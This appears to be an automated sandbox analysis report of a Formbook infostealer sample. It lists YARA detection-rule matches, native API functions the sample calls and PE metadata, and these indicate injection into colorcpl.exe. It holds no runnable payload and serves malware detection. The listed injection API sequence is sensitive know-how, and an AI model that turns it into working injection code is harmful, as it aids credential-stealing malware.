          Source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.275382730.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Nz7NA3F7z7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Nz7NA3F7z7.exe.22f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Nz7NA3F7z7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_004181C0 NtCreateFile,1_2_004181C0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00418270 NtReadFile,1_2_00418270
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_004182F0 NtClose,1_2_004182F0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_004183A0 NtAllocateVirtualMemory,1_2_004183A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_0041817A NtCreateFile,1_2_0041817A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_004181BA NtCreateFile,1_2_004181BA
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_0041826A NtReadFile,1_2_0041826A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B798F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00B798F0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00B79860
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79840 NtDelayExecution,LdrInitializeThunk,1_2_00B79840
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B799A0 NtCreateSection,LdrInitializeThunk,1_2_00B799A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00B79910
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79A20 NtResumeThread,LdrInitializeThunk,1_2_00B79A20
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00B79A00
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79A50 NtCreateFile,LdrInitializeThunk,1_2_00B79A50
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B795D0 NtClose,LdrInitializeThunk,1_2_00B795D0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79540 NtReadFile,LdrInitializeThunk,1_2_00B79540
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B796E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00B796E0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00B79660
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B797A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00B797A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79780 NtMapViewOfSection,LdrInitializeThunk,1_2_00B79780
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79FE0 NtCreateMutant,LdrInitializeThunk,1_2_00B79FE0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79710 NtQueryInformationToken,LdrInitializeThunk,1_2_00B79710
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B798A0 NtWriteVirtualMemory,1_2_00B798A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79820 NtEnumerateKey,1_2_00B79820
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B7B040 NtSuspendThread,1_2_00B7B040
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B799D0 NtCreateProcessEx,1_2_00B799D0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79950 NtQueueApcThread,1_2_00B79950
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79A80 NtOpenDirectoryObject,1_2_00B79A80
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79A10 NtQuerySection,1_2_00B79A10
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B7A3B0 NtGetContextThread,1_2_00B7A3B0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79B00 NtSetValueKey,1_2_00B79B00
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B795F0 NtQueryInformationFile,1_2_00B795F0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B7AD30 NtSetContextThread,1_2_00B7AD30
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79520 NtWaitForSingleObject,1_2_00B79520
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79560 NtWriteFile,1_2_00B79560
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B796D0 NtCreateKey,1_2_00B796D0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79610 NtEnumerateValueKey,1_2_00B79610
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79670 NtQueryInformationProcess,1_2_00B79670
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79650 NtQueryValueKey,1_2_00B79650
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79730 NtQueryVirtualMemory,1_2_00B79730
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B7A710 NtOpenProcessToken,1_2_00B7A710
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79770 NtSetInformationFile,1_2_00B79770
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B7A770 NtOpenThread,1_2_00B7A770
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B79760 NtOpenProcess,1_2_00B79760
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_1_004181C0 NtCreateFile,1_1_004181C0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_1_00418270 NtReadFile,1_1_00418270
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_1_004182F0 NtClose,1_1_004182F0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_1_004183A0 NtAllocateVirtualMemory,1_1_004183A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_1_0041817A NtCreateFile,1_1_0041817A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_1_004181BA NtCreateFile,1_1_004181BA
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_1_0041826A NtReadFile,1_1_0041826A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F595D0 NtClose,LdrInitializeThunk,7_2_04F595D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59540 NtReadFile,LdrInitializeThunk,7_2_04F59540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F596E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04F596E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F596D0 NtCreateKey,LdrInitializeThunk,7_2_04F596D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04F59660
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59650 NtQueryValueKey,LdrInitializeThunk,7_2_04F59650
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59FE0 NtCreateMutant,LdrInitializeThunk,7_2_04F59FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59780 NtMapViewOfSection,LdrInitializeThunk,7_2_04F59780
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59710 NtQueryInformationToken,LdrInitializeThunk,7_2_04F59710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59860 NtQuerySystemInformation,LdrInitializeThunk,7_2_04F59860
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59840 NtDelayExecution,LdrInitializeThunk,7_2_04F59840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F599A0 NtCreateSection,LdrInitializeThunk,7_2_04F599A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_04F59910
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59A50 NtCreateFile,LdrInitializeThunk,7_2_04F59A50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F595F0 NtQueryInformationFile,7_2_04F595F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59560 NtWriteFile,7_2_04F59560
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F5AD30 NtSetContextThread,7_2_04F5AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59520 NtWaitForSingleObject,7_2_04F59520
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59670 NtQueryInformationProcess,7_2_04F59670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59610 NtEnumerateValueKey,7_2_04F59610
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F597A0 NtUnmapViewOfSection,7_2_04F597A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F5A770 NtOpenThread,7_2_04F5A770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59770 NtSetInformationFile,7_2_04F59770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59760 NtOpenProcess,7_2_04F59760
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59730 NtQueryVirtualMemory,7_2_04F59730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F5A710 NtOpenProcessToken,7_2_04F5A710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F598F0 NtReadVirtualMemory,7_2_04F598F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F598A0 NtWriteVirtualMemory,7_2_04F598A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F5B040 NtSuspendThread,7_2_04F5B040
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59820 NtEnumerateKey,7_2_04F59820
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F599D0 NtCreateProcessEx,7_2_04F599D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59950 NtQueueApcThread,7_2_04F59950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59A80 NtOpenDirectoryObject,7_2_04F59A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59A20 NtResumeThread,7_2_04F59A20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59A10 NtQuerySection,7_2_04F59A10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59A00 NtProtectVirtualMemory,7_2_04F59A00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F5A3B0 NtGetContextThread,7_2_04F5A3B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F59B00 NtSetValueKey,7_2_04F59B00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DA81C0 NtCreateFile,7_2_00DA81C0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DA82F0 NtClose,7_2_00DA82F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DA8270 NtReadFile,7_2_00DA8270
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DA83A0 NtAllocateVirtualMemory,7_2_00DA83A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DA81BA NtCreateFile,7_2_00DA81BA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DA817A NtCreateFile,7_2_00DA817A
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DA826A NtReadFile,7_2_00DA826A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_004063540_2_00406354
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_004048020_2_00404802
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 0_2_00406B2B0_2_00406B2B
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_0041B8081_2_0041B808
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_004010301_2_00401030
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_0041A2AA1_2_0041A2AA
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_0041BBA81_2_0041BBA8
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00408C601_2_00408C60
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_0041BD281_2_0041BD28
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00402D8E1_2_00402D8E
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00402D901_2_00402D90
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_0041C7851_2_0041C785
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00402FB01_2_00402FB0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B620A01_2_00B620A0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4B0901_2_00B4B090
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C028EC1_2_00C028EC
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C020A81_2_00C020A8
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF10021_2_00BF1002
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C0E8241_2_00C0E824
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B541201_2_00B54120
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B3F9001_2_00B3F900
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C022AE1_2_00C022AE
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B6EBB01_2_00B6EBB0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BF03DA1_2_00BF03DA
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFDBD21_2_00BFDBD2
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C02B281_2_00C02B28
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4841F1_2_00B4841F
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFD4661_2_00BFD466
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C025DD1_2_00C025DD
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B625811_2_00B62581
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B4D5E01_2_00B4D5E0
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B30D201_2_00B30D20
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C01D551_2_00C01D55
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C02D071_2_00C02D07
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C02EF71_2_00C02EF7
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00B56E301_2_00B56E30
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00BFD6161_2_00BFD616
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C0DFCE1_2_00C0DFCE
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_2_00C01FF11_2_00C01FF1
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_1_0041B8081_1_0041B808
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: 1_1_004010301_1_00401030
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FDD4667_2_04FDD466
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2841F7_2_04F2841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2D5E07_2_04F2D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE25DD7_2_04FE25DD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F425817_2_04F42581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE1D557_2_04FE1D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F10D207_2_04F10D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE2D077_2_04FE2D07
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE2EF77_2_04FE2EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F36E307_2_04F36E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FDD6167_2_04FDD616
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE1FF17_2_04FE1FF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FEDFCE7_2_04FEDFCE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE28EC7_2_04FE28EC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F420A07_2_04F420A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE20A87_2_04FE20A8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F2B0907_2_04F2B090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FEE8247_2_04FEE824
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD10027_2_04FD1002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F341207_2_04F34120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F1F9007_2_04F1F900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE22AE7_2_04FE22AE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FCFA2B7_2_04FCFA2B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FD03DA7_2_04FD03DA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FDDBD27_2_04FDDBD2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F4EBB07_2_04F4EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04F3AB407_2_04F3AB40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_04FE2B287_2_04FE2B28
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DAA2AA7_2_00DAA2AA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00D98C607_2_00D98C60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00D92D907_2_00D92D90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00D92D8E7_2_00D92D8E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00DAC7857_2_00DAC785
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_00D92FB07_2_00D92FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04F1B150 appears 45 times
          Source: C:\Users\user\Desktop\Nz7NA3F7z7.exeCode function: String function: 00B3B150 appears 39 times
          Source: Nz7NA3F7z7.exe, 00000000.00000003.218025103.0000000002C2F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Nz7NA3F7z7.exe
          Source: Nz7NA3F7z7.exe, 00000001.00000002.275560525.0000000000673000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs Nz7NA3F7z7.exe
          Source: Nz7NA3F7z7.exe, 00000001.00000002.275858832.0000000000C2F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Nz7NA3F7z7.exe
          Source: Nz7NA3F7z7.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.484188593.0000000001320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.275429619.00000000005E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.222946934.00000000022F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.482585966.0000000000D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.484311977.0000000001350000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
